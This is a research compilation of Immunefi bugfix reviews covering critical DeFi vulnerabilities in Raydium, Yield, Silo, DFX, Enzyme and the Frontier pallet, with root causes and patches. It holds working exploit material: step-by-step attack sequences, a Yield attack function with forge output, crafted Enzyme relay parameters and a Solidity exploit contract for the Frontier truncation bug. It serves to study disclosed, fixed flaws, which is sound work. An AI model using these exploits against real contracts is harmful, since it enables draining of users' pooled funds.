This repository documents research on critical bug fixes identified on Immunefi in 2023-2024, highlighting how these vulnerabilities were exploited, their impact on projects, and the subsequent fixes implemented. The goal is to provide insights into common pitfalls, remediation strategies, and lessons learned from real-world bug bounty reports.
Reported by: @riproprip
Protocol: Raydium
Date: January 10, 2024
Bounty: $505,000 in RAY tokens
The vulnerability in Raydium's increase_liquidity
function allowed attackers to manipulate liquidity at arbitrary price points by exploiting the tickarray_bitmap_extension
. The function failed to verify if the account used for this extension was correct, letting attackers misuse it to "flip" tick statuses and perform unauthorized liquidity operations. This manipulation could significantly impact the pool's integrity and lead to financial loss. The fix involved adding a validation step to ensure the correct TickArrayBitmapExtension
account is used, preventing these unauthorized actions.
Raydium is an AMM with an integrated central order book system. Users can provide liquidity, perform swaps on the exchange, and stake the RAY token for additional yield. A fundamental aspect of Raydium is the Concentrated Liquidity Market Maker (CLMM).
The vulnerability was located within the increase_liquidity file of the Raydium protocol. It conducts several critical operations, including pool status validation, token amount calculations based on user-provided maximums, fee updates, and the actual increase of liquidity in the position’s state.
Ticks represent discrete price points in a CLMM. By defining a range with tick_lower and tick_upper, an LP specifies the boundaries within which their liquidity will be active.
The flaw was specifically in the conditional handling of the tickarray_bitmap_extension:
let use_tickarray_bitmap_extension = pool_state.is_overflow_default_tickarray_bitmap(vec![tick_lower, tick_upper]);
[...]
if use_tickarray_bitmap_extension {
Some(&remaining_accounts[0])
} else {
None
}
The tickarray_bitmap_extension
is crucial in managing the pool’s pricing at extreme boundaries (very high or low prices). It also acts as an extended index to manage a larger range of price ticks which helps track which ticks have been initialized (i.e., have non-zero liquidity) beyond the default capacity of the system. The conditional logic decides whether an account from remaining_accounts
is needed for the operation. This account is presumably related to handling the tick array bitmap extension. This function is designed to increase liquidity in a specific position within a liquidity pool using the remaining_accounts vector.
remaining_accounts
is a vector containing all accounts passed into the instruction but not declared in the Accounts struct. This is useful when you want your function to handle a variable amount of accounts, e.g. when initializing a game with a variable number of players.
The vulnerability arises because the function fails to verify whether remaining_accounts[0]
is the accurate TickArrayBitmapExtension
account linked to the current state of the pool. This oversight permits an attacker to execute liquidity operations at arbitrary price boundaries as described in the vulnerability demonstration section below.
- Create a Secondary Pool: The attacker sets up a secondary pool.
- Target a Tick: They open a position at a specific tick they want to exploit in the primary pool.
- Zero Out and Manipulate Liquidity: They reduce the liquidity at this tick to zero and then increase it in a way that incorrectly uses the tickarray_bitmap of the primary pool.
This manipulation lets the attacker “flip” a tick’s status in the bitmap. Transactions that should have adjusted liquidity at certain prices bypass these checks, allowing unauthorized liquidity increases.
To clarify the exploit process using a practical example, consider price points A, B, and C, with A < B < C and both A and B within the lower range of the bitmap_array
.
The steps to exploit the vulnerability are as follows:
- Identify a victim pool.
- Execute a swap to shift the price to just above point A (A+1).
- Create liquidity within the price range B to C.
- Perform a swap across B without crossing C, which adds liquidity to the pool state due to the manipulated
tickarray_bitmap
. - Execute the described attack to switch the
tickarray_bitmap
status at B to DISABLED, allowing a swap at A+1 to skip over B without affecting liquidity. - Repeat the attack to re-enable the
tickarray_bitmap
at B. - Perform another swap over B without crossing C, effectively doubling the liquidity erroneously.
- This process can be repeated as many times as desired to amass an excessive amount of liquidity.
- Following this procedure, swaps directed towards C will yield disproportionately high amounts of Token A, indicating the vulnerability has been fully exploited.
- If the goal is to acquire Token B, the process can be replicated at the higher end of the price spectrum. The core issue is the ability to “flip” a tick’s status within the tickarray_bitmap, allowing liquidity to be added without proper checks. This leads to significant discrepancies in liquidity management and compromises the integrity of the liquidity pool.
The correction involved adding a security check to ensure the correct application of the tickarray_bitmap_extension
:
if use_tickarray_bitmap_extension {
require_keys_eq!(
remaining_accounts[0].key(),
TickArrayBitmapExtension::key(pool_state_loader.key())
);
Some(&remaining_accounts[0])
} else {
None
}
This fix introduces a validation step to confirm that the remaining_accounts[0]
is the correct TickArrayBitmapExtension
account associated with the pool’s current state.
This ensures the proper handling of liquidity operations involving extreme price boundaries, thereby preventing the exploitation of this vulnerability in the future.
Reported by: @Paludo0x
Protocol: Yield
Date: April 28th, 2023
Bounty: $95,000 USDC
The vulnerability in the Yield Protocol's strategy contract arises from the burn()
function, which calculates the LP tokens to return to the user based on the current balance of LP tokens in the contract (pool.balanceOf(address(this))
). An attacker can inflate this balance by sending extra LP tokens to the contract before calling burn, allowing them to withdraw more tokens than they originally deposited, effectively stealing from the protocol.
Yield Protocol is a DeFi protocol that enables fixed-rate, fixed-term loan options between borrowers and lenders.
The protocol facilitates these transactions via fyTokens
(fixed yield tokens), a type of ERC-20
token that can be exchanged one-to-one for an underlying asset upon reaching a predetermined maturity date.
The vulnerability is associated with the strategy contract of the protocol, which enables liquidity providers to deposit combined liquidity to a YieldSpace
Pool.
By depositing funds into the strategy contract, liquidity providers can mint strategy tokens. The amount of strategy tokens they receive corresponds proportionately to their deposit amount, allowing them to burn and redeem the LP tokens as well as any gain in fees/interest later.
This vulnerability is associated with the burning shares functionality burn(address to)
of the strategy contract which is responsible for burning the strategy tokens and allowing the user to withdraw the LP tokens:
function burn(address to)
external
isState(State.INVESTED)
returns (uint256 poolTokensObtained)
{
// Caching
IPool pool_ = pool;
uint256 poolCached_ = poolCached;
uint256 totalSupply_ = _totalSupply;
// Burn strategy tokens
uint256 burnt = _balanceOf[address(this)];
_burn(address(this), burnt);
poolTokensObtained = pool.balanceOf(address(this)) * burnt / totalSupply_;
pool_.safeTransfer(address(to), poolTokensObtained);
// Update pool cache
poolCached = poolCached_ - poolTokensObtained;
}
Initially, the contract’s strategy tokens are burned. Then, the amount of liquidity pool tokens to be acquired are calculated based on the LP tokens contained in the strategy contract and are transferred to the designated address.
The pool tokens to be returned to the caller are calculated by:
poolTokensObtained = pool.balanceOf(address(this)) * burnt / totalSupply_;
This calculation is based on the LP tokens balance of the current strategy contract which could be inflated by sending the pool tokens directly to it.
The attacker has control over pool.balanceOf(address(this))
, which allows them to inflate the pool tokens returned, by transferring a specific amount of pool tokens directly to the strategy contract before burning the strategy shares tokens.
As the pool tokens remain within the Strategy contract, the attacker making the call can mint the share tokens and then burn them back to retrieve the pool tokens that were utilized to inflate the calculation.
This is done by the call to mint()
function to get the strategy share tokens then the call to burn()
function again to get back the LP tokens that were transferred.
- Clone the Immunefi bugfix review repository:
git clone https://github.com/immunefi-team/bugfix-reviews-pocs.git
- Run
forge test -vvv --match-path ./test/YieldProtocol/AttackTest.t.sol
Attack function:
function _executeAttack() internal {
console.log("\n>>> Execute attack\n");
//burning of strategy tokens
uint256 tokensBurnt = strategyYSDAI6MMS.burn(ada);
//burning remaing part of LP tokens sent to strategy
strategyYSDAI6MMS.mint(address(strategyYSDAI6MMS));
strategyYSDAI6MMS.burn(ada);
//retrieving and converting all tokens to base token
FYDAI2309LPArbitrum.transfer(address(FYDAI2309LPArbitrum), FYDAI2309LPArbitrum.balanceOf(ada));
FYDAI2309LPArbitrum.burnForBase(ada,0,type(uint128).max); // get fyToken to the ADA
FYDAI2309LPArbitrum.retrieveBase(ada); // get DAI stored on the contract to the ADA
FYDAI2309LPArbitrum.retrieveFYToken(ada); // get fyToken stoeed on the contract to the ADA.
console.log("Tokens Burnt : ",tokensBurnt);
_completeAttack();
}
Log output:
Ran 1 test for test/YieldProtocol/AttackTest.t.sol:AttackTest
[PASS] testAttack() (gas: 677227)
Logs:
>>> Initiate attack
Tokens Obtained : 20916988492243432153263
>>> Execute attack
Tokens Burnt : 32081082781615545896437
>>> Attack complete
holder gain in base wei : 11096784340278200659569
pool gain in base wei : -11096784340278200659569
Strategy gain in base wei : 0
holder gain in FYToken : 0
pool gain in FYToken : 0
Strategy gain in FYToken : 0
holder gain in LPToken : 0
pool gain in LPToken : 0
Strategy gain in LPToken : -11164094289372113743173
Pool base token amount before transactions: 1.3330628639753853259506e22
Pool base token amount after transactions: 2.233844299475652599937e21
holder base token amount before transactions: 1e24
holder base token amount after transactions: 1.011096784340278200659569e24
Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 7.61s (6.15s CPU time)
In the patch, the project team modified the burn()
function in the strategy contract to use poolCached_
instead of pool.balanceOf(address(this))
to determine the number of LP tokens that should be transferred to the caller, fixing the issue.
The new formula would be:
poolTokensObtained = poolCached_ * burnt / totalSupply_;
Reported by: @kankodu
Protocol: Silo Finance
Date: April 28th, 2023
Bounty: $100,000 USDC
A vulnerability in the Base Silo contract of Silo Finance allowed attackers to manipulate the utilization rate and interest calculations by donating assets to markets with zero initial deposits. By becoming the majority shareholder and manipulating the utilization rate, attackers could inflate interest rates and borrow disproportionately high amounts of funds. The temporary fix involved depositing assets to prevent zero deposits, and the permanent fix capped utilization rates at 100% and limited maximum interest rates. Formal verification by Certora confirmed these fixes were effective against similar exploits.
The whitehat reported the vulnerability in the BaseSilo.sol contract which is responsible for handling the core logic of the lending protocol. The Silo contract is a lending protocol which allows users to deposit collateral asset tokens to the contract by calling the deposit()
function of the contract. In return, the contract mints the share of tokens to the depositor based on the deposited amount and the total supply of the share and updates the storage state _assetStorage[_asset]
with the deposited amount:
AssetStorage storage _state = _assetStorage[_asset];
collateralAmount = _amount;
uint256 totalDepositsCached = _collateralOnly ? _state.collateralOnlyDeposits : _state.totalDeposits;
if (_collateralOnly) {
collateralShare = _amount.toShare(totalDepositsCached, _state.collateralOnlyToken.totalSupply());
_state.collateralOnlyDeposits = totalDepositsCached + _amount;
_state.collateralOnlyToken.mint(_depositor, collateralShare);
} else {
collateralShare = _amount.toShare(totalDepositsCached, _state.collateralToken.totalSupply());
_state.totalDeposits = totalDepositsCached + _amount;
_state.collateralToken.mint(_depositor, collateralShare);
}
The users who deposit the collateral in the contract can borrow other assets from the protocol by using the borrow()
function, which updates the accrued interest rate of the borrowing asset first and then checks to see if the current contract has enough tokens for the user to borrow. Then, the function transfers the tokens to the user and checks the loan-to-value (LTV) ratio based on the collateral provided.
function _borrow(address _asset, address _borrower, address _receiver, uint256 _amount)
internal
nonReentrant
returns (uint256 debtAmount, uint256 debtShare)
{
// MUST BE CALLED AS FIRST METHOD!
_accrueInterest(_asset);
if (!borrowPossible(_asset, _borrower)) revert BorrowNotPossible();
if (liquidity(_asset) < _amount) revert NotEnoughLiquidity();
/// @inheritdoc IBaseSilo
function liquidity(address _asset) public view returns (uint256) {
return ERC20(_asset).balanceOf(address(this)) - _assetStorage[_asset].collateralOnlyDeposits;
}
On a high level, the vulnerability allows an attacker to manipulate the utilization rate of an asset that had zero total deposit to the contract. An attacker can manipulate the utilization rate by donating an ERC20 asset to the contract, and if the attacker had the majority of the shares in the market for that particular asset, borrowing the donated token would inflate the utilization rate of that particular asset. In general, the steps to reproduce this attack:
- Determine a market that had 0 total deposits for one of the assets in the market. For example, WETH had 0 total deposits.
- Become the majority shareholder for that particular asset by depositing WETH to that market, which will make the
totalDeposits
for that asset non-zero. - Donate additional WETH to the market, which will allow other users to borrow more WETH than the total deposited WETH, on step 2.
- Use another user/address to deposit another asset in the market, to borrow the donated WETH.
- In the next block, if
accrueInterest()
is called, the utilization rate of the attacker's initial deposited amount will be over 100%, which will increase the interest rate to an extremely high value. - Because of this inflated interest rate, the attacker’s initial deposit is valued more than it should be, and it allows the attacker to borrow most of the funds in the market.
/// @inheritdoc IBaseSilo
function liquidity(address _asset) public view returns (uint256) {
return ERC20(_asset).balanceOf(address(this)) - _assetStorage[_asset].collateralOnlyDeposits;
}
The steps to use this POC is as follows:
- Install https://github.com/foundry-rs/foundry
- Replace
Counter.sol
with BugFixReview.sol - Replace
Counter.t.sol
with BugFixReview.t.sol - Run
forge test — match-path test/BugFixReview.t.sol -vvv
This POC will make a local fork on 17139470 and 17139471 and will try to manipulate the interest rate on the first block before stealing funds on the second block. Since the attack occurs over two blocks, we can’t use a flashloan to demonstrate the attack.
What we can do instead is to use deal from Forge to manipulate the attacker contract balance.
The project temporarily fixed the vulnerable market after the report was submitted, and after the proper fix is ready, the code is deployed to the mainnet.
The first mitigation that the project implemented was to deposit an asset to the market that had 0 total deposits in the market, which can be seen in this transaction.
However, this deposit only mitigated the vulnerable market temporarily. For the permanent fix, the project implemented a cap in the utilization rate calculation and limited the maximum compounded interest rate to 10k % APR. The former one is to make sure that the utilization rate never exceeds 100% of utilization rate. And the latter is to stop producing yield after compounded interest passes 10%, unless accrueInterest()
is being called.
To make sure the fixes that the project implemented are secure and didn’t leave any edge cases, the code went through formal verification from Certora, with added rules that cover this vulnerability. Those rules are:
cantExceedMaxUtilization
and interestNotMoreThenMax
.
cantExceedMaxUtilization
is an invariant that guarantees that the utilization rate never exceeds 100%. This means that no one can borrow more than the deposited amount.interestNotMoreThenMax
tests the fixes to make sure that the interest rate cannot exceed the max limit.
The details for both of these rules/specs were already published by the project, which you can access in their Github.
The permanent fix can be seen at this address.
For further information regarding the fixes that Silo Finance and Certora made to fix this vulnerability, you can read here and here.
Reported by: @perseverance
Protocol: DFX Finance
Date: April 28, 2023
Bounty: $100,000 USDT
A vulnerability in DFX Finance’s AssimilatorV2 contract allowed users to exploit the token transfer calculation when using EURS tokens, which have fewer decimals than most tokens. By repeatedly depositing small amounts that resulted in zero tokens being transferred, attackers could still receive minted curve tokens representing pool shares. This allowed attackers to progressively take over the pool without providing corresponding liquidity. DFX Finance fixed the issue by requiring that the transferred amount is greater than zero before allowing the transaction.
DFX Finance is a decentralized foreign exchange (FX) protocol. DFX Finance creates a decentralized marketplace where users can swap non-USD stablecoins pegged to various foreign currencies, such as CADC, EUROC, XSGD, and more. These types of exchanges also typically incentivize liquidity providers to supply capital by offering yield on funds deposited. The design uses an automated market making mechanism (AMM) to allow the exchange to operate in a decentralized way. The AMM exchanges tokens according to a bonding curve, which is dynamically adjusted according to real world price feeds from Chainlink. Each currency is paired with USDC, which is treated as a bridge currency in the DFX AMM between all other stablecoins.
Assimilators are necessary when dealing with pairs of different values, which is core to DFX protocol as all assets are paired with USDC. The AssimilatorV2 contract is responsible for converting all amounts to a numeraire, or a base value used for computations across the protocol. DFX Finance maintains the assimilators which integrate with Curve to provide proportional liquidity to pools. When users would like to provide liquidity to a pool to receive yield on their stablecoins, they call the deposit function on the Curve pool and receive liquidity provider tokens in return representing their proportion of the underlying asset they deposited.
When a user deposits EURS, the function checks if the deposit amount is greater than zero, and then delegates most of the logic to the library call ProportionalLiquidity.proportionalDeposit
.
Within the proportionalDeposit()
function, the curve pool calls to the AssimilatorV2
contract intakeNumeraireLPRatio
to calculate the corresponding amount of euros to transfer from the user, which is calculated on line 145, based on the LP ratio passed to the function:
// takes a numeraire amount, calculates the raw amount of eurs, transfers it in and returns the corresponding raw amount
function intakeNumeraireLPRatio(
uint256 _baseWeight,
uint256 _minBaseAmount,
uint256 _maxBaseAmount,
uint256 _quoteWeight,
uint256 _minQuoteAmount,
uint256 _maxQuoteAmount,
address _addr,
int128 _amount
) external override returns (uint256 amount_) {
uint256 _tokenBal = token.balanceOf(_addr);
if (_tokenBal <= 0) return 0;
_tokenBal = _tokenBal.mul(1e18).div(_baseWeight);
uint256 _usdcBal = usdc.balanceOf(_addr).mul(1e18).div(_quoteWeight);
// Rate is in 1e6
uint256 _rate = _usdcBal.mul(10**tokenDecimals).div(_tokenBal);
amount_ = (_amount.mulu(10**tokenDecimals) * 1e6) / _rate;
if (address(token) == address(usdc)) {
require(amount_ >= _minQuoteAmount && amount_ <= _maxQuoteAmount, "Assimilator/LP Ratio imbalanced!");
} else {
require(amount_ >= _minBaseAmount && amount_ <= _maxBaseAmount, "Assimilator/LP Ratio imbalanced!");
}
token.safeTransferFrom(msg.sender, address(this), amount_);
}
After the transfer of the deposit is handled in the intakeNumeraireLPRatio()
function and liquidity is transferred from the user to the contract, the proportionalDeposit()
function mints the number of LP tokens which represents the users’ share of the pool. Finally, the deposit function returns the value of deposits and shares minted:
function proportionalDeposit(...)
external
returns (uint256 curves_, uint256[] memory)
{
...
require(_newShells > 0, "Proportional Liquidity/can't mint negative amount");
mint(curve, msg.sender, curves_ = _newShells.mulu(1e18));
return (curves_, deposits_);
}
DFX Finance’s contracts contained a vulnerability that stemmed from the calculation of the transfer amount within the AssimilatorV2
contract on line 145. The issue arises when the _rate
exceeds the numerator value, resulting in an integer division that leads to zero tokens being transferred from the user. Despite transferring zero tokens, the user still receives curve tokens which represent their portion of the curve pool. To exploit this, an attacker would deposit a minuscule amount of tokens, causing the transferred amount to be zero while still receiving minted curve tokens in exchange for the small proportion of tokens “deposited”:
// Rate is in 1e6
uint256 _rate = _usdcBal.mul(10**tokenDecimals).div(_tokenBal);
Typically, tokens have at least six decimals, which limits the potential profit to an amount lower than would be spent on gas for the transaction. However, the EURS token on the Polygon network has only two decimals. By utilizing the EURS token and repeatedly depositing a small amount (around 10,000 times) within a single transaction, an attacker can generate a profit of approximately 172 EURO or 190 USDC per attack by withdrawing the minted curve tokens. At the time of submission, the vulnerable pool had a balance of $237,143 USD, which could have been stolen by an attacker progressively acquiring a larger portion of the pool through successive attacks.
The Immunefi team prepared the following PoC to demonstrate the vulnerability.
DFX Finance fixed the issue by deploying a new version of the AssimilatorV2 contract and added a require
statement which checks the amount to be transferred from the user is greater than zero. The existing Curve pool was migrated to using the new Assimilator.
// takes a numeraire amount, calculates the raw amount of eurs, transfers it in and returns the corresponding raw amount
function intakeNumeraire(int128 _amount)
external
override
returns (uint256 amount_)
{
uint256 _rate = getRate();
amount_ = (_amount.mulu(10**tokenDecimals) * 10**oracleDecimals) / _rate;
require(amount_ > 0, "intakeNumeraire/zero-amount!");
token.safeTransferFrom(msg.sender, address(this), amount_);
}
Reported by: @rootrescue
Protocol: Enzyme Finance
Date: Mar 28, 2023
Bounty: $400,000
Enzyme Finance's use of the Gas Station Network had a vulnerability in their preRelayedCall()
function due to missing validation of the forwarder address. Attackers could exploit this by using a malicious forwarder to relay transactions and manipulate fees, allowing them to drain funds from the paymaster. The fix added a check to ensure only trusted forwarders are used, preventing unauthorized fee manipulation and protecting the system from exploitation.
Enzyme Finance is a decentralized asset management platform built on Ethereum. It enables anyone to create, manage, and invest in custom investment strategies using a variety of different assets, including cryptocurrencies and other digital assets.
Enzyme makes use of the Gas Station Network (GSN) to allow gasless clients to interact with Ethereum smart contracts without users needing ETH for transaction fees.
The GSN is a decentralized network of relayers that allows dApps to pay the costs of transactions instead of individual users. This can lower the barrier of entry for users and increase user experience by allowing users to make gasless transactions.
The GSN makes use of meta-transactions
. Meta-transactions
are a design pattern in which users sign messages containing information about a transaction they would like to execute, but relayers are responsible for signing the Ethereum transaction, sending it to the network, and paying the gas cost.
The flow of meta-transactions is as follows:
- The user sends a signed message to the relay server containing transaction details.
- The relay server verifies the transaction and ensures that there are sufficient fees to cover the costs.
- The relay server generates a new transaction that uses the user’s signed message, trusted forwarder’s address, and paymaster’s address to call the relay hub.
- The relay server signs the new transaction and sends it to the Ethereum network, paying the necessary gas fees in advance.
- After receiving the transaction, the relay hub calls the trusted forwarder contract with the user’s signed message and then calls the recipient contract.
- The trusted forwarder validates the user’s signature, recovers the user’s address, and transmits the transaction to the recipient contract.
- The transaction is executed and the blockchain state is updated by the recipient contract.
- Following the completion of the transaction, the relay hub requests reimbursement from the paymaster contract for the relay server’s gas fees.
- The paymaster contract validates the transaction and sends funds (in tokens or ETH) to the relay server to cover the gas fees and any additional service fees.
Enzyme has a set of contracts that support the use of the GSN. This consists of GasRelayPaymasterLib
, GasRelayPaymasterFactory
, and GasRelayRecipientMixin
. The GasRelayPaymasterFactory
helps create instances of paymasters, and the GasRelayRecipientMixin
has shared logic that is inherited for relayable
transactions. The GasRelayPaymasterLib
is responsible for providing the logic for paymasters, and importantly, the rules for calls that can be relayed. The paymaster is intended to validate that the forwarder is approved by the paymaster as well as by the recipient contract in preRelayedCall()
function:
function preRelayedCall(
GsnTypes.RelayRequest calldata relayRequest,
bytes calldata signature,
bytes calldata approvalData,
uint256 maxPossibleGas
)
external
override
returns (bytes memory, bool) {
_verifyRelayHubOnly();
_verifyForwarder(relayRequest);
_verifyValue(relayRequest);
_verifyPaymasterData(relayRequest);
_verifyApprovalData(approvalData);
return _preRelayedCall(relayRequest, signature, approvalData, maxPossibleGas);
}
However, within Enzyme’s GasRelayPaymasterLib
contract, the external function which contained the check for a valid forwarder was overridden:
/// @notice Checks whether the paymaster will pay for a given relayed tx
/// @param _relayRequest The full relay request structure
/// @return context_ The tx signer and the fn sig, encoded so that it can be passed to `postRelayCall`
/// @return rejectOnRecipientRevert_ Always false
function preRelayedCall(
IGsnTypes.RelayRequest calldata _relayRequest,
bytes calldata,
bytes calldata,
uint256
)
external
override
relayHubOnly
returns (bytes memory context_, bool rejectOnRecipientRevert_)
{
address vaultProxy = getParentVault();
require(
IVault(vaultProxy).canRelayCalls(_relayRequest.request.from),
"preRelayedCall: Unauthorized caller"
);
bytes4 selector = __parseTxDataFunctionSelector(_relayRequest.request.data);
require(
__isAllowedCall(
vaultProxy,
_relayRequest.request.to,
selector,
_relayRequest.request.data
),
"preRelayedCall: Function call not permitted"
);
return (abi.encode(_relayRequest.request.from, selector), false);
}
When a relayed transaction is sent via GSN in a typical flow, the trusted forwarder is being relied on to perform an important security check, verifying the user’s signature when a transaction is relayed. Since a malicious trusted forwarder can be provided due to missing verification of the provided forwarder’s address in the paymaster, the signature verification can be bypassed, and a relay call can be crafted in such a way that the paymaster returns much more fees than expected since the from
address is believed to be the address which matches the signature provided. An attacker would craft the following parameters of relayCall
to exploit the missing validation after deploying a malicious forwarder:
const relayRequest = {
from: VaultOwnerAddr, // Address to emulate (signature not verified)
to: ComptrollerProxyAddr, // Bypass checks in preRelayedCall()
value: 0,
gas: ...,
nonce: ...,
data: '0x39bf70d1', // 0x39bf70d1 == callOnExtension()
validUntil: ...,
};
const relayData = {
gasPrice: ...,
pctRelayFee: 1000, // 1000% fee to be returned to relay worker
baseRelayFee: 0, // Base fee can be used to manipulate returned funds
relayWorker: RelayWorkerAddr, // Attacker relay worker
paymaster: PaymasterAddr, // Enzyme controlled paymaster
forwarder: ExploitForwarder.address, // Attacker malicious forwarder
paymasterData: true, // top up the paymaster if not enough funds
clientId: ...,
};
let tx = await RelayHub.connect(impersonatedSigner)
.relayCall(defaultMaxAcceptance,
{
request: relayRequest,
relayData: relayData
},
requestSignature,
approvalData,
externalGasLimit,
);
The most relevant changes to the relay data are the forwarder
, which is set to the malicious forwarder deployed by the attacker, and the pctRelayFee
and baseRelayFee
which can be used to manipulate the amount of funds returned to the relayWorker by the paymaster.
To address this issue, Enzyme introduced the following commit to add the required check within the GasRelayPaymasterLib, which verifies if the passed address is a trusted forwarder and reverts otherwise.
function preRelayedCall(
IGsnTypes.RelayRequest calldata _relayRequest,
bytes calldata,
bytes calldata,
uint256
)
external
override
relayHubOnly
returns (bytes memory context_, bool rejectOnRecipientRevert_)
{
+ require(
+ _relayRequest.relayData.forwarder == TRUSTED_FORWARDER,
+ "preRelayedCall: Unauthorized forwarder"
+ );
address vaultProxy = getParentVault();
require(
IVault(vaultProxy).canRelayCalls(_relayRequest.request.from),
"preRelayedCall: Unauthorized caller"
);
bytes4 selector = __parseTxDataFunctionSelector(_relayRequest.request.data);
require(
__isAllowedCall(
vaultProxy,
_relayRequest.request.to,
selector,
_relayRequest.request.data
),
"preRelayedCall: Function call not permitted"
);
return (abi.encode(_relayRequest.request.from, selector), false);
}
Reported by: @pwning.eth
Protocol: Moonbeam, Astar Network, and Acala
Date: June 27th, 2023
Bounty: $1,000,000
In the Frontier pallet for Substrate, there's a vulnerability due to the truncation of msg.value
from 256 bits to 128 bits in the transfer
function. This causes smart contracts to mistakenly accept large values as valid when they are actually truncated to zero. An attacker can exploit this by creating and withdrawing from wrapper tokens as if they had deposited a large amount of value, leading to the potential draining of all wrapped tokens on the network. This can also affect DEXes by allowing attackers to drain tokens from them as well.
The bug, which was found within Frontier — the Substrate pallet that provides core Ethereum compatibility features within the Polkadot ecosystem–impacted Moonbeam, Astar Network, and Acala.
On Moonbeam, we have native tokens like MOVR
and GLMR
and their wrapped counterparts, like WMOVR
and WGLRM
. Likewise, on Astar, there is Astar
and Wrapped Astar
.
The central issue was with how Frontier handled low-level EVM events:
fn transfer(&mut self, transfer: Transfer) -> Result<(), ExitError> {
let source = T::AddressMapping::into_account_id(transfer.source);
let target = T::AddressMapping::into_account_id(transfer.target);
T::Currency::transfer(
&source,
&target,
@> transfer.value.low_u128().unique_saturated_into(),
ExistenceRequirement::AllowDeath,
)
.map_err(|_| ExitError::OutOfFund)
}
In the above code snippet, we notice in transfer
that the msg.value
is reduced (or truncated) from 256 bits to 128 bits. This seemingly innocuous oversight might result in a serious discrepancy between the runtime and the EVM environment.
What is truncation? In simplest terms, truncation means to cut off a portion of the number. If we do decimal truncation of 9.8, we would cut off 0.8 and we would be left with 9. In bit truncation, we truncate the higher bits of a number. For example, truncating a 32 bit number to 16 bits would result in higher-end bits being cut off and only the lower 16 bits staying.
65539 (32 bit) to 16 bit would result in the number 3. Why?
65539 is 10000000000000011 in binary. As it only takes 17 bits to hold that number, we only leave with the lower 16 bits (counting from right), and we are left with 0000000000000011, which is 3.
What does this all mean in the context of the bug? Smart contracts believe that the huge 256 bit msg.value
is valid, although the actual transfer never happens, as the truncated value will be zero, even though we passed in msg.value
2¹²⁸
.
In reality, we won’t be transferring any native tokens, due to this error. However, smart contracts that accept msg.value
as though it were in 256 bit format (wrapper contracts, for example), will think we transferred 2¹²⁸
!
With this trick, we could create as many wrapper tokens as we wanted to and later withdraw everything from wrapper contracts. This would drain every wrapped token on the network.
But that’s not all. With DEXes accepting native transfer of tokens to swap to any other token, we could also drain all DEXes on such a network.
To illustrate the above, here is a sample contract to exploit the bug:
// SPDX-License-Identifier: GPL-3.0
pragma solidity >=0.8.0;
interface IWETH {
function deposit() external payable;
function withdraw(uint wad) external;
}
contract Exploit {
IWMOVR private wmovr;
constructor(address _wmovr) {
wmovr = IWMOVR(_wmovr);
}
function depositWMOVR() payable external {
uint256 val = msg.value + (1 << 128);
wmovr.deposit{value: val}();
}
function withdrawMOVR(uint256 amount) external {
wmovr.withdraw(amount);
}
function balance() public view returns (uint256) {
return address(this).balance;
}
fallback() external payable {}
}
A step-by-step guide for understanding how the exploit works practically:
- Deploy the above exploit contract onto the Moonbeam network with the address of the Wrapped MOVR contract.
- Call
depositWMOVR()
function withmsg.value=0
. Theval
will be evaluated into2¹²⁸ + 0
. This will mean that during the deposit intoWMOVR
, we won’t be transferring anyMOVR
as it will be truncated to0
. - Call
withdrawMOVR()
. TheWMOVR
contract will think we deposited2¹²⁸
in the previous step thus allowing us to get2¹²⁸
MOVR
by only paying for the transaction fees! - Profit.
Moonbeam released a new Runtime 1606 which addressed the issue by removing the truncation. More information about the fix can be found here in their security announcement.
As Moonbeam is also one of the maintainers of the library, they released a bug fix.
[1]. https://medium.com/immunefi/raydium-tick-manipulation-bugfix-review-c6aae4527ed6
[2]. https://medium.com/immunefi/yield-protocol-logic-error-bugfix-review-7b86741e6f50
[3]. https://medium.com/immunefi/silo-finance-logic-error-bugfix-review-35de29bd934a
[4]. https://medium.com/immunefi/dfx-finance-rounding-error-bugfix-review-17ba5ffb4114
[5]. https://medium.com/immunefi/enzyme-finance-missing-privilege-check-bugfix-review-ddb5e87b8058
For questions or suggestions, please contact me.
Tigran Piliposyan